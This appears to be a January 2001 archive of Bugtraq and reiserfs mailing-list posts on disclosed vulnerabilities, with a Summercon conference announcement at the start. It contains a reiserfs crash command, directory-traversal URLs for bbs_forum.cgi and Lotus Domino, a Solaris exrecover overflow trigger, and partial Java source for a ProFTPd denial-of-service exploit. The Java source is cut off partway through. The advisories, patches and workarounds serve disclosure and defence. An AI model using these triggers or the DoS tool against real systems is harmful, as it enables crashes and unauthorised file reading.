date:20010109

summercon 2001 announce

2001-01-09 Thread Louis Trumpbour


-BEGIN PGP SIGNED MESSAGE-

Summercon 2001
The Grand Hotel Krasnapolsky
01-03 June 2001
Amsterdam, NL

This year's Summercon will be quite different from those of years
past. For the first time ever the conference will be outside of the
United States with this years venue being the Netherlands. (The
official language will be English).
Next, the event will be much better organized then in years past. For
example, there are already confirmed presenters.
Also, for the first time in five years, there is going to be an
entrance fee (US $25) for access to the presentations. These sessions
will be available live via streaming media and edited sessions will
be available online sometime after the conference.
A publication named the Summer Security Journal will be made
available containing edited contents of each of the presentations.
And, finally, this year the press will have access to the conference.

As always, the conference should be fun and filled with unexpected
moments. Amsterdam is renown for a culture that the security
community will find it easy to identify with both intellectually and
festively.

Updated information will be available on the website at
http://www.summercon.org/ and via the mailing list.


Location:
The Grand Hotel Krasnopolsky
Dam 9 1012 JS AMSTERDAM
Phone +31 20 5549111
Fax +31 20 6228607
[EMAIL PROTECTED]
http://www.krasnapolsky.nl/en_index.asp

Dates:
15 February 2001Paper and speaker info posted to site
01 June 2001Arrivals and Introductions
02 June 2001Presentations
03 June 2001Farewell

Transportation
By Air:
Fly to Amsterdam Airport Schiphol (AMS).
see: http://www.schiphol.nl/
Bus, Rail, and Taxi service can take you to central Amsterdam from
the Schiphol airport to the hotel.
Schiphol is a major international airport and most every major
carrier provides service to this destination.
Booking flights well in advance will keep the purchase price
reasonable.

Additional transportation information can be found at
http://www.summercon.org/transportation/index.html

Mailing List:
To join the Summercon 2001 mailing list send email to
[EMAIL PROTECTED] with the subject line "subscribe scon2001"
without quotes.

Contact:
For more information or questions about the conference email
[EMAIL PROTECTED]

or visit the website: http://www.summercon.org/

Press:
For serious press inquiries please contact via
[EMAIL PROTECTED] address for a further details.


Louis Trumpbour
Summercon Coordinator

-BEGIN PGP SIGNATURE-
Version: PGP 6.5i

iQEVAwUBOlukkD/qQp/ayCXlAQHtugf+J5PvLGFi9rHyeqcGqyQkdzXXXl40bqha
2ZwHQ3POz0bIKbedXcQY9N/NjnT7nSDTcl5Hi8LEr0iD4MhDkndAELxBqWlcVt/8
xSYiJESb/X5oN5TxW/tPnRVxN0HdpVDYdsAtzNFStttzJvOK9xxEpbYYPbRU1GsQ
eOl1KPFGZEBq8+dKaEyUJPtXwZtkjYt6Wq024Yy+Cr7k2ClKIq0M0J1YVlvVylkt
JXvZtUsnoaz6kIeJHw5/UP6W6M1FcSR/tD/Tbmm3f/nxhEVw3Mx5hOWGeT0zrQCv
3uuJGFlsa+ui85dSjOXdqccU3VGwceLPx/T5U5zZkXnL5n2OvpsITQ==
=EfqX
-END PGP SIGNATURE-

Re: [reiserfs-list] major security bug in reiserfs (may affect SuSE Linux)

2001-01-09 Thread John Morrison


I can't reproduce this.

[root@vaio /root]# mkdir "$(perl -e 'print "x" x 768')"
[root@vaio /root]# ls











[root@vaio /root]#



John


> We are still investigating, but there seems to be a major security problem
> in at least some versions of reiserfs. Since reiserfs is shipped with
> newer versions of SuSE Linux and the problem is too easy to reproduce and
> VERY dangerous I think alerting people to this problem is in order.
>
> We have tested and verified this problem on a number of different systems
> and kernels 2.2.17/2.2.8 with reiserfs-3.5.28 and probably other versions.
>
> Basically, you do:
>
> mkdir "$(perl -e 'print "x" x 768')"
>
> I.e. create a very long directory. The name doesn't seem to be of
> relevance (we found this out by doing mkdir "$(cat /etc/hosts)" for other
> tests). This works.  The next ls (or echo *) command will segfault and the
> kernel oopses. all following accesses to the volume in question will oops
> and hang the process, even afetr a reboot.
>
> reiserfsck (the filesystem check program) does _NOT_ detect or solve this
> problem:
>
> Replaying journal..ok
> Checking S+tree..ok
> Comparing bitmaps..ok
>
> But fortunately, rmdir  works and seems to leave the filesystem
> undamaged.
>
> Since a kernel oops results (see below), this indicates a buffer overrun
> (the kernel jumps to address 78787878, which is "") inside the kernel,
> which is of course very nasty (think ftp-upload!) and certainly gives you
> root access from anywhere, even from inside a chrooted environment. We
> didn't pursue this further.
>
> The best workaround at this time seems to be to uninstall reiserfs
> completely or not allow any user access (even indirect) to these volumes.
> While this individual bug might be easy to fix, we believe that other,
> similar bugs should be easy to find so reiserfs should not be trusted (it
> shouldn't be trusted to full user access for other reasons anyway, but it
> is still widely used).
>
> Unable to handle kernel paging request at virtual address 78787878
> current->tss.cr3 = 0d074000, %cr3 = 0d074000
> *pde = 
> Oops: 0002
> CPU:0
> EIP:0010:[]
> EFLAGS: 00010282
> eax:    ebx: bfffe78c   ecx:    edx: bfffe78c
> esi: ccbddd62   edi: 78787878   ebp: 0300   esp: ccbddd3c
> ds: 0018   es: 0018   ss: 0018
> Process bash (pid: 292, process nr: 54, stackpage=ccbdd000)
> Stack: c013f66a ccbddf6c cd10 ccbddd62 030c c0136d49 0700 2013
>1000 7878030c 78787878 78787878 78787878 78787878 78787878 78787878
>78787878 78787878 78787878 78787878 78787878 78787878 78787878 78787878
> Call Trace: [] []
> Code: 89 1f 8b 44 24 18 29 47 08 31 c0 5b 5e 5f 5d 81 c4 2c 01 00
>
>
>

Re: [reiserfs-list] major security bug in reiserfs (may affect SuSE Linux)

2001-01-09 Thread Vladimir V. Saveliev


Hi

Marc Lehmann wrote:

> We are still investigating, but there seems to be a major security problem
> in at least some versions of reiserfs. Since reiserfs is shipped with
> newer versions of SuSE Linux and the problem is too easy to reproduce and
> VERY dangerous I think alerting people to this problem is in order.
>
> We have tested and verified this problem on a number of different systems
> and kernels 2.2.17/2.2.8 with reiserfs-3.5.28 and probably other versions.
>
> Basically, you do:
>
> mkdir "$(perl -e 'print "x" x 768')"
>
> I.e. create a very long directory. The name doesn't seem to be of
> relevance (we found this out by doing mkdir "$(cat /etc/hosts)" for other
> tests). This works.  The next ls (or echo *) command will segfault and the
> kernel oopses. all following accesses to the volume in question will oops
> and hang the process, even afetr a reboot.
>

Hmm,
mkdir "$(perl -e 'print "x" x 768')"
ls
echo *

works here as it should. (2.2.18 and reiserfs-3.5.29)

Did I miss something?

Thanks,
vs



>
> reiserfsck (the filesystem check program) does _NOT_ detect or solve this
> problem:
>
> Replaying journal..ok
> Checking S+tree..ok
> Comparing bitmaps..ok
>
> But fortunately, rmdir  works and seems to leave the filesystem
> undamaged.
>
> Since a kernel oops results (see below), this indicates a buffer overrun
> (the kernel jumps to address 78787878, which is "") inside the kernel,
> which is of course very nasty (think ftp-upload!) and certainly gives you
> root access from anywhere, even from inside a chrooted environment. We
> didn't pursue this further.
>
> The best workaround at this time seems to be to uninstall reiserfs
> completely or not allow any user access (even indirect) to these volumes.
> While this individual bug might be easy to fix, we believe that other,
> similar bugs should be easy to find so reiserfs should not be trusted (it
> shouldn't be trusted to full user access for other reasons anyway, but it
> is still widely used).
>
> Unable to handle kernel paging request at virtual address 78787878
> current->tss.cr3 = 0d074000, %cr3 = 0d074000
> *pde = 
> Oops: 0002
> CPU:0
> EIP:0010:[]
> EFLAGS: 00010282
> eax:    ebx: bfffe78c   ecx:    edx: bfffe78c
> esi: ccbddd62   edi: 78787878   ebp: 0300   esp: ccbddd3c
> ds: 0018   es: 0018   ss: 0018
> Process bash (pid: 292, process nr: 54, stackpage=ccbdd000)
> Stack: c013f66a ccbddf6c cd10 ccbddd62 030c c0136d49 0700 2013
>1000 7878030c 78787878 78787878 78787878 78787878 78787878 78787878
>78787878 78787878 78787878 78787878 78787878 78787878 78787878 78787878
> Call Trace: [] []
> Code: 89 1f 8b 44 24 18 29 47 08 31 c0 5b 5e 5f 5d 81 c4 2c 01 00
>
> --
>   -==- |
>   ==-- _   |
>   ---==---(_)__  __   __   Marc Lehmann  +--
>   --==---/ / _ \/ // /\ \/ /   [EMAIL PROTECTED] |e|
>   -=/_/_//_/\_,_/ /_/\_\   XX11-RIPE --+
> The choice of a GNU generation   |
>  |

Re: [reiserfs-list] major security bug in reiserfs (may affect SuSE Linux)

2001-01-09 Thread Chris Mason


On Wednesday, January 10, 2001 12:42:01 AM +0100 Marc Lehmann
<[EMAIL PROTECTED]> wrote:

> We are still investigating, but there seems to be a major security problem
> in at least some versions of reiserfs. Since reiserfs is shipped with
> newer versions of SuSE Linux and the problem is too easy to reproduce and
> VERY dangerous I think alerting people to this problem is in order.
>

Sorry, a quick attempt at reproducing on 2.2.17 and 2.2.19 kernels did not
cause an oops.  Could you please send me a decoded version of the oops to
help track things down?

thanks,
Chris

major security bug in reiserfs (may affect SuSE Linux)

2001-01-09 Thread Marc Lehmann


We are still investigating, but there seems to be a major security problem
in at least some versions of reiserfs. Since reiserfs is shipped with
newer versions of SuSE Linux and the problem is too easy to reproduce and
VERY dangerous I think alerting people to this problem is in order.

We have tested and verified this problem on a number of different systems
and kernels 2.2.17/2.2.8 with reiserfs-3.5.28 and probably other versions.

Basically, you do:

mkdir "$(perl -e 'print "x" x 768')"

I.e. create a very long directory. The name doesn't seem to be of
relevance (we found this out by doing mkdir "$(cat /etc/hosts)" for other
tests). This works.  The next ls (or echo *) command will segfault and the
kernel oopses. all following accesses to the volume in question will oops
and hang the process, even afetr a reboot.

reiserfsck (the filesystem check program) does _NOT_ detect or solve this
problem:

Replaying journal..ok
Checking S+tree..ok
Comparing bitmaps..ok

But fortunately, rmdir  works and seems to leave the filesystem
undamaged.

Since a kernel oops results (see below), this indicates a buffer overrun
(the kernel jumps to address 78787878, which is "") inside the kernel,
which is of course very nasty (think ftp-upload!) and certainly gives you
root access from anywhere, even from inside a chrooted environment. We
didn't pursue this further.

The best workaround at this time seems to be to uninstall reiserfs
completely or not allow any user access (even indirect) to these volumes.
While this individual bug might be easy to fix, we believe that other,
similar bugs should be easy to find so reiserfs should not be trusted (it
shouldn't be trusted to full user access for other reasons anyway, but it
is still widely used).

Unable to handle kernel paging request at virtual address 78787878
current->tss.cr3 = 0d074000, %cr3 = 0d074000
*pde = 
Oops: 0002
CPU:0
EIP:0010:[]
EFLAGS: 00010282
eax:    ebx: bfffe78c   ecx:    edx: bfffe78c
esi: ccbddd62   edi: 78787878   ebp: 0300   esp: ccbddd3c
ds: 0018   es: 0018   ss: 0018
Process bash (pid: 292, process nr: 54, stackpage=ccbdd000)
Stack: c013f66a ccbddf6c cd10 ccbddd62 030c c0136d49 0700 2013
   1000 7878030c 78787878 78787878 78787878 78787878 78787878 78787878
   78787878 78787878 78787878 78787878 78787878 78787878 78787878 78787878
Call Trace: [] []
Code: 89 1f 8b 44 24 18 29 47 08 31 c0 5b 5e 5f 5d 81 c4 2c 01 00


--
  -==- |
  ==-- _   |
  ---==---(_)__  __   __   Marc Lehmann  +--
  --==---/ / _ \/ // /\ \/ /   [EMAIL PROTECTED] |e|
  -=/_/_//_/\_,_/ /_/\_\   XX11-RIPE --+
The choice of a GNU generation   |
 |

Re: Audiogalaxy.com mp3 sharing software

2001-01-09 Thread Michael Merhej


Hello,

While its true if a user got a hold of your 
password they could send you mp3 files - or at 
least files with an mp3 extension.   The satellite 
will only name files with a .temp or .mp3 
extension.  Even if the filename is really an 
executable it will have a .mp3 extension.  To 
actually run the file you would then need to 
purposely rename the file with a .exe extension.

Hope this helps - if you have any other security 
related questions I will be glad to answer.

> 2. Problem?
> While this problem will not stop the world or 
allow the script kiddies
> to ./wu their way through us, its a problem none 
the less.  Versions of
> Audiogalaxy Satelite software pre .601W for 
windows held the username and
> password for a users account in a plain text file 
within the audiogalaxy
> directory on their system.  While if an intruder 
gained this information only
> the list of songs in the download que (which is 
stored on the server) would
> be compromised, this could have other effects.
> 
> 2a.  theory one 1.  Gain the username and 
password for a users acct. Intruder
> modies the download que so that when the 
user comes online they will download
> a "mp3" from the intruders system.   The mp3 is 
actually something else. ie.
> virus or back orifice or similar program.  If the 
user ran the mp3 directly
> then of course the infection would start. --lets 
examine this a little
> further. Evil intruder steals password and 
username. Edits download que.
> User runs fake mp3 which is back orifice. User 
gets keylogged.  User is
> goverment employee who telnets  (telnet bad) 
into secure goverment system.
> Goverment system not secure anymore.  Web 
site gets defaced. Oh no the
> kiddies can use this.
> 
> 2b. theory two. 2.  Many users use a common 
password and this is the point
> that i brought to Audiogalaxy.  While its not their 
problem if a user does
> this, why not help out.  If the user had their 
Audiogalaxy username and
> password compromised then its possible other 
things get compromised.
> 
> 
> 3. Solution
> 
> Upgrade to the newest version which has been 
out for sometime, and in general
> use different passwords.
> 
> Note- I have not checked the Linux version for 
any problems, if someone gets
> to it before I do pleae let me know.
>

Re: Cgisecurity.com Advisory #3.1

2001-01-09 Thread Gunther Birznieks

Clarification to the remote execution versus remote file reading portion of
the advisory:

1) Very old versions of bbs_forum.cgi suffered from ability to execute
commands through lack of input handling.

This was fixed several years ago two-fold: (1) adding taint mode and (2)
tightening perl's open() commands so that the file operator (eg <) were
included literally instead of relying on the default open operator being
"open for read".

Part of this advisory was written from testing this pre-taintmode version
of the script.

2) However, taintmode does not check user input for reading files. So a
directory traversal/arbitrary file reading bug remained in the read
parameter when used in conjunction with several other input parameters as
stated below.

When we were alerted by CGISecurity.com, we also gave the script another
quick once-over and discovered a different but similar domino effect on the
reply_to_message parameter as well.

Both those problems are fixed with the patch we provided below in
CGISecurity's posting.

In summary, those people running a version of bbs_forum.cgi without
taintmode are running a really old version and should upgrade completely as
they've ignored our prior security alerts.

Those people who do have taintmode enabled in the script can safely assume
the patch below is the only patch they require.

At 04:52 PM 1/7/01 -0500, [EMAIL PROTECTED] wrote:
>The staff at cgisecurity.com have found a security issue with a
>forum script that is widley used.
>
>Below is the advisory along with the vendor patch.
>
>-zenomorph
>
> [Cgi Security Advisory #3.1]
>   [EMAIL PROTECTED]
>bbs_forum.cgi
>
>
>
>Found
>January 3rd 2001
>
>Vendor Contacted
>January 3rd 2001
>
>Public Release
>January 7th 2001
>
>
>
>Script Effected: bbs_forum.cgi
>Free
>
>Versions Effected:
>1.0
>(Others unknown)
>
>Platforms
>UNIX
>
>Vendor
>http://www.extropia.com
>Patch
>http://www.extropia.com/hacks/bbs_security0.html
>
>
>
>
>1. Impact
>
>Any file can be read with the permissions of user nobody(or webserver).
>Possible root comprimise in bbs_forum.cgi script. Command execution is
>allowed and therefore shell spawning is possible. This has been tested on
>unix and linux systems only and it is unknown if windows versions exist
>and/or are effected.
>
>One thing to be noted about this hole is that perl was in taint mode, and
>still allowed files to be read, and commands to be executed. This was
>not originally intended. This is proof that perl -t is not always
>enough.
>
>Example:
>
>www.host.com/cgi-bin/bbs_forum.cgi?forum=name>&read=../bbs_forum.cgi
>Will grab the scripts own sourcecode.
>Note: In order for this hole to work a valid forum name must be used,
>so simply trying to call read= only may not work.
>
>2. Fixes
>
>The vendor has been contacted about this serious security problem.
>Please visit the vendor's website for patches and other important
>information.
>
>
>
>3. Attached Vendor Patch
>
>Note: This is a patch for people who know what they are doing.
>Please visit http://www.extropia.com/hacks/bbs_security0.html
>for information on upgrading.
>
>
>
>* Vendor patch snippet **
>
>If you have made extensive modifications to bbs_forum.cgi and do not wish
>to start over from scratch, search for the line at the start of
>bbs_forum.cgi that says
>
>   &ReadParse;
>
>   And insert afterwards the following:
>
>   if ($in{'read'} && $in{'read'} !~ /^\d+-\d+\.msg$/i)
>{
>   print "Invalid Message #";
>   die("Invalid Message # provided: " .
>   $in{'read'});
>   }
>   if ($in{'reply_to_message'} &&
>$in{'reply_to_message'} !~ /^\d+-\d+\.msg$/i) {
>   print "Invalid Reply To Message #";
>   die("Invalid Reply To Message # provided: " .
>   $in{'reply_to_message'});
>   }
>
>This code assures the script that the message file
>form variables can only consist of the strict filename format of digits
>followed by a hyphen followed by some digits followed by the literal
>string ".msg".
>
>We recommend updating your script as soon as possible.
>Special thanks to cgisecurity.com for pointing our the issue.
>
>
> End Patch **
>
>Published to the Public January 2001
>Copyright January 2001 Cgisecurity.com

__
Gunther Birznieks ([EMAIL PROTECTED])
eXtropia - The Web Technology Company
http://www.extropia.com/

Re: Solaris /usr/lib/exrecover buffer overflow

2001-01-09 Thread Darren J Moffat

Pablo Sor wrote:

> The /usr/lib/exrecover contains a buffer overflow
> (this command is suid in Solaris 2.4/5/6)

Starting with Solaris 7 exrecover is no longer installed setuid root.

It is safe to change the exrecover permissions to 0555 on all other
releases since it doesn't need elevated privleges to do its job;
/var/preserve is 1777.

This is Sun bug# 4161925

--
Darren J Moffat

Memory leakage in ProFTPd leads to remote DoS (SIZE FTP); (Exploit Code)

2001-01-09 Thread JeT Li


Hello Bugtraq:

Not so much time ago a ProFTPd remote vulnerability was released:

" ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
calling the FTP command SIZE 5000 times it possible to cause ProFTPd to
consume over 300kB of memory. Exploiting this bug with more SIZE commands
gives us simple DoS attack. Anonymous access is sufficient to use SIZE
commands and to exploit this bug."

I have coded a program that do more than 5000 size's requests to the
server, in order to crash it. ¿Why in Java? well I think the procedure is
enough simple to needn't code it in c. In addition, ¿Why not in Java? ;-) we
don't need various versions of the program for Linux, BSD, Solaris, etc; there
is an unique program for all the OS and architectures. I wanna bet in favor of
the use of Java to code next generation xploits & DoS ;-)

Vulnerability:  Remote DoS in ProFTPd
Requirements:   Anonymous or normal user access
Vulnerable systems:
ProFTPd 1.2.0rc1(Tested)
ProFTPd 1.2.0rc2(Tested)
And maybe others (1.2.0preX); I have no test this, but I'm sure you can
do it for me ;-)

And now, here is the code:

proftpDoS.java
---
/*  Remote DoS in proFTPd
Code by: JeT-Li -The Wushu Master-  [EMAIL PROTECTED]

Well here is a little explanation about the concept of the DoS:
ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
calling the FTP command SIZE 5000 times it possible to cause ProFTPd
to  consume over 300kB of memory. Exploiting this bug with more SIZE
commands  gives us simple DoS attack. Anonymous access is
sufficient to use SIZE  commands and to exploit this bug.

You don't have to give arguments when you execute the program, it will
request you these.

Greets: _kiss_ (the real fucker ;-P); gordoc (no comment, the most
hax man in the w0rld); Perip|o (tibetan mantras for u! ;-P); and all
the ppl of #hackers (not able for cardiac XD).

Vulnerable systems:
ProFTPd 1.2.0rc1(Tested)
ProFTPd 1.2.0rc2(Tested)
And maybe others (1.2.0preX); I have no test this, but I'm sure you can
do it for me ;-)
*/

import java.net.*;
import java.io.*;

class TCPconnection {

public TCPconnection (String hostname, int portnumber) throws Exception {
Socket s = doaSocket(hostname, portnumber);
br = new BufferedReader (new InputStreamReader (s.getInputStream()));
ps = new PrintStream (s.getOutputStream());
}

public String readLine() throws Exception {
String s;
try {   s = br.readLine();  }
catch (IOException ioe) {
System.out.println("TCP Error ... it's a little hax0r exception ;-)");
throw new Exception ("\nInput Error: I/O Error");
}
return s;
}

public void println(String s) {
ps.println(s);
}

private Socket doaSocket(String hostname, int portnumber) throws Exception {
Socket s = null;
int attempts = 0;
while (s == null && attemptshttp://im.yahoo.com

Re: Audiogalaxy.com mp3 sharing software

2001-01-09 Thread Adam Knight


On Tue, 9 Jan 2001 [EMAIL PROTECTED] wrote:

>Note- I have not checked the Linux version for any problems, if someone gets
>to it before I do pleae let me know.

The Linux version has this problem and it has not been fixed.  The .6 series
of the program has not been released for Linux as of yet (currently
.52).  account.txt is clear text in that version.
--

Adam Knight[EMAIL PROTECTED]
MIS Developerhttp://www.jump.net
__Codito, ergo sum__

 A feature is a bug with seniority.

Re: bugtraq id 2173 Lotus Domino Server

2001-01-09 Thread Hendrik-Jan Verheij






Thanks to Ninke Westra for testing 
this...
 
The same problem as in my previous post exists in 
this case
 
If you append a phoney directory to the  url 
passed on to the webserver the exploit will still work, however you have to back 
out an extra time.
 
example url:
 
target.victim.com/nonexistingdir/.nsf/../../fileyouwanttoget 

This makes the url redirection solution less 
obvious to guess, but it still leaves you vulnerable.
 
Regards,
 

Hendrik-Jan Verheij  http://redheat.orgHostmaster Popin 
Internet    +3174 2555770[EMAIL PROTECTED]    http://www.popin.nlAssimilation is 
irrelevant, You are futile!

  - Original Message - 
  From: 
  Alan Bell 

  To: [EMAIL PROTECTED] 
  Sent: Tuesday, January 09, 2001 12:02 
  PM
  Subject: bugtraq id 2173 Lotus Domino 
  Server
  Further information on this 
  issue: 1) This issue has been 
  reproduced on several versions of domino prior to 5.0.5 2) My testing has failed to reproduce this issue on 
  Linux and OS/400 (AS/400) 3) To secure 
  your boxes create 3 file protection documents for each server granting no 
  access to the following paths. /.nsf/../ /.box/../ 
  /.ns4/../ the other common domino extensions .ns3 and .ntf do not 
  appear to be vulnerable. This is not a Lotus supported solution (as yet) so 
  there may be additional similar paths with this behaviour. You should watch 
  http://www.notes.net for an upgrade which will probably appear as 
  5.0.6a. Alan.

Re: New DDoS?

2001-01-09 Thread Ryan Russell

On Tue, 9 Jan 2001, nealk wrote:

> Alternate (New) DDoS model:
>   - Server 'A' directly prevents all clients from accessing server 'B'.

I don't see how this is particularly "distributed".

> Let's say that someone placed a corrupt Flash (SWF) file on a web server.
> All clients that access the web server and that view the Flash file
> (about 90% of all browsers can, so this is a good assumption) will
> have their browsers crash or hang.
>

I.e. if you can hack the server, then the clients will be susceptible to
client holes.  Yes, absolutely.  I've been waiting for this one for some
time... rather that make an obvious defacement when one breaks into a web
site, leave the site up as-is (at a superficial level), but with a browser
hole embedded in the HTML.

The problems with this being terribly effective is that it will be found
relatively quickly (at least, if it's a popular site) and that there is a
central place to fix it quickly.  Even if the defacement sticks around for
a few days, even non-technical users will pretty quickly learn that when
they visit example.com, their browser crashes.

The attack would have to be subtle (i.e. not crash the browser) and the
site would have to be popular, but not very carefully watched by the
administrators.  In fact, given a powerful enough hole, this is a good way
to build an army of traditional zombies.  Or steal loads of personal info
off of clients.

Ryan

Solaris /usr/lib/exrecover buffer overflow

2001-01-09 Thread Pablo Sor


Hi,

The /usr/lib/exrecover contains a buffer overflow
(this command is suid in Solaris 2.4/5/6)
The problem occurs when it gets the second argument, it accepts the
argument without checking out its lenght and this causes the problem.
The overflow seems to be in the heap space.

$ /usr/lib/exrecover hola `perl -e 'printf "A"x5'`
Segmentation Fault (core dumped)

$ gdb /usr/lib/exrecover --core=core

GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you

are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "sparc-sun-solaris2.6"...
(no debugging symbols found)...
Core was generated by `/usr/lib/exrecover hola
AAA'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/lib/libmapmalloc.so.1...
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols
found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-5_10/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0  0xef6a44d8 in strcpy ()


Pablo Sor
[EMAIL PROTECTED]

Re: New DDoS?

2001-01-09 Thread Alfred Perlstein

* nealk <[EMAIL PROTECTED]> [010109 10:41] wrote:
> I think I have stumbled across a new category of distributed denial
> of service (DDoS).  (If this is old news, I'm sure I'll be corrected;
> it's new to me.)
>
> Traditional DDoS have the follow flow:
>   - A host (or few hosts) controls a large number of clients.
>   - The clients are directed by the host to attack a single site/server.
> The attack can either be network or service oriented.
>
>
> Alternate (New) DDoS model:
>   - Server 'A' directly prevents all clients from accessing server 'B'.
>
>
> Here's an example of how it could work:
> I recently posted about a Flash plugin risk that can crash or hang a browser.
>
> Let's say that someone placed a corrupt Flash (SWF) file on a web server.
> All clients that access the web server and that view the Flash file
> (about 90% of all browsers can, so this is a good assumption) will
> have their browsers crash or hang.

While this is a possibility, it doesn't make much sense, news would
spread like wildfire and people would drop links to the add service
pretty quickly.  Your attack would need either:
a) a suicidal company.
b) a hacked ad server.
c) widespread DNS poisoning.

Ad services can do other nasties like using 302s to redirect hundreds
or thousands of hits to a particularly system intensive service on
a remote site, that's a nasty DoS but also a good way to get yourself
involved in a nasty lawsuit.

--
-Alfred Perlstein - [[EMAIL PROTECTED]|[EMAIL PROTECTED]]
"I have the heart of a child; I keep it in a jar on my desk."

Re: New DDoS?

2001-01-09 Thread Mailing List


Interesting... but all the big ad agencies like Doubleclick screen the ads
that they allow into their system.
If the person that was authorizing ads had his browser hang when they went
to view a particular ad, don't you think they would be suspicious?

Of course, this does not solve the problem, but the situation you described
probably wouldn't happen in real life.

The situation I can imagine in which this MIGHT happen is with the
LinkExchanges, but 99.999% of them only allow gif/jpg pictures, and not
flash or any other formats.

Another situation I can see is with the email programs. Many of them open up
in the INBOX folder. Now, if a person receives an email formatted with html
and has a 'bad' flash file in it, the person's email would crash instantly,
denying access to any mail functions. The person could theoritically press
delete before the flash file crashes the email program, but as you can see
this would already deny access at least a few times till the person catches
on.

Any ideas?

Jason.

- Original Message -
From: "nealk" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, 10 January, 2001 12:07 AM
Subject: New DDoS?


> I think I have stumbled across a new category of distributed denial
> of service (DDoS).  (If this is old news, I'm sure I'll be corrected;
> it's new to me.)
>
> Traditional DDoS have the follow flow:
>   - A host (or few hosts) controls a large number of clients.
>   - The clients are directed by the host to attack a single site/server.
> The attack can either be network or service oriented.
>
>
> Alternate (New) DDoS model:
>   - Server 'A' directly prevents all clients from accessing server 'B'.
>
>
> Here's an example of how it could work:
> I recently posted about a Flash plugin risk that can crash or hang a
browser.
>
> Let's say that someone placed a corrupt Flash (SWF) file on a web server.
> All clients that access the web server and that view the Flash file
> (about 90% of all browsers can, so this is a good assumption) will
> have their browsers crash or hang.
>
> This is a DoS against the site, but it attacks the clients rather than
> the server.
>
> Now, let's take it one step further.
> Doubleclick, adtegrity.spinbox.net, and Akamai are linked by most
> large web sites.  (Amazon, eBay, AltaVista, etc.)
> I have observed these sites returning banner ads written as jpeg,
> gif, and SWF.
> Let's say that one of the SWF files is corrupted.
> The single ad site can effectively deny all client access to the host
> site by crashing/hanging all client browsers.
>
> Server 'A' (the ad site) can directly prevent all clients from
> accessing server 'B' (the host web site).
>
> What's worse:  This is more difficult to identify since local testing
> on the local server may not identify why the clients are crashing.
> The local server does not know what information was sent to the clients
> by the ad sites.
>
> In this example, I used ad sites and SWF files.  It can be done with
> any third-party site (remember all the Web Bugs discussions?).
> Although SWF can do it today, I'm sure there will be more technologies
> that can do it tomorrow.
>
>
> Question: How can sites protect themselves from this?
> (I mean: Aside from the obvious, "don't link to ad sites.")
>
>
> Finally, I'm sure there are some script kiddies just dying to be "the
> first one to pull this off".  Please don't.  Accidents happen all by
> themselves and it's only a matter of time before this is seen in the
> wild and by accident.  Why bother implementing something this trivial?
>
>
> Thoughts?
>
> -Neal
>

Lotus Domino 5.0.5 Web Server vulnerability WORK AROUNDS

2001-01-09 Thread Dyson, Thom


These came to me from the Notes Admin List.


---Solution 1-
I don't the original author of this fix, so I can't give proper credit.

Add a File Protection Document in your PAB/DD:

Path: /.box/../

Access Control: -Default- - No Access

Repeat this for .ns4 and .nsf (.ns3 and .ntf are not affected).

Once you do this, do "tell http restart" or bounce your server.


---Solution 2-
>Well, as Lotus haven't released a fix for the *confirmed* bug, we
>get a workaround. Adding the following line:
>
>map */../* /something.nsf
>
>  at httpd.conf, seems to handle the bug. You should notice that
>EVERYTHING using ../ links will stop working too, including the bug !
>
>  We tested this on NT4 sp6a and Domino 5.0.5, and we COULDN'T get
>the bug working after those lines were added.
>
>  As we couldn't reproduce the bug on Linux Domino servers, and
>seems that nobody could, we don't think adding those lines on Linux
>httpd.conf servers is necessary.
>
>  Sincerily,
> Rodolfo Stein ([EMAIL PROTECTED])
>  Solution Web ( http://www.solutionweb.com.br )



Solution one works.  I have not tried solution 2.

Thom Dyson
Director of Information Services
Sybex, Inc.

Re: New DDoS?

2001-01-09 Thread Szilveszter Adam

Hello and Happy New Year everybody,

On Tue, Jan 09, 2001 at 08:07:37AM -0800, nealk wrote:
> Traditional DDoS have the follow flow:
>   - A host (or few hosts) controls a large number of clients.
>   - The clients are directed by the host to attack a single site/server.
> The attack can either be network or service oriented.
>
>
> Alternate (New) DDoS model:
>   - Server 'A' directly prevents all clients from accessing server 'B'.

Well, I do not think that this qualifies as a DoS. Denial of Service is
when the site denies service to the clients contacting it. Here, the
clients are attacked, but similar attacks have been around for a long time.
I think of eg DNS poisoning, which will prevent users from accessing the
site they want (although they get something else) or a whole class of
Man-in-the-middle-Attacks. Yet, these all count as themselves and not as
DoS when making categories. But this may well be an unimportant semantics
thing. (On a very important side-note, although users will not get to the
service, this kind of attack does not incur huge load on the server and the
network nodes and does not cause marginal conditions, much less will it be
able to bring down a server. So you can react to it can be a much more relaxed
manner, and also at least the perpetrators are not endangering the
whole Internet infrastructure with their deeds, but rather just one
particular service. This, of course may be no cause for joy to the service
concerned, but as soon as you discover what's wrong, you can take quick
decisive action and restore access to the service *without any performance
loss* visible to the customer. There is no rate-limiting problem, no
slowdown, nothing. So the danger is a lot more benign.)

> Here's an example of how it could work:
> I recently posted about a Flash plugin risk that can crash or hang a browser.
>
> Let's say that someone placed a corrupt Flash (SWF) file on a web server.
> All clients that access the web server and that view the Flash file
> (about 90% of all browsers can, so this is a good assumption) will
> have their browsers crash or hang.
>
> This is a DoS against the site, but it attacks the clients rather than
> the server.

Yes, but this not new in the sense that if you can place a corrupt SWF file
there, you can place any other "bad" content as well. Exploiting scripting
bugs, eg. Also, a DoS is IMHO more sweeping in definition. If a site is
DoS-ed than you cannot get at it, period. While here merely not having  or
disabling the
offending plugin already gives you access. If this were a DoS, then some
leading portal and other high-profile sites continually are DoS-ing their
users with eg scripts that only work on IE but may crash Netscape. (At one
time microsoft.com came into such suspicion because a certain page took
almost forever to download and render with Netscape on non-windows
platforms and some users experienced browser hang or crash. However, upon
more testing it was found that the page took longest to display on Win98
and I think IE4. Whoo-whoo:-)

> Now, let's take it one step further.
> Doubleclick, adtegrity.spinbox.net, and Akamai are linked by most
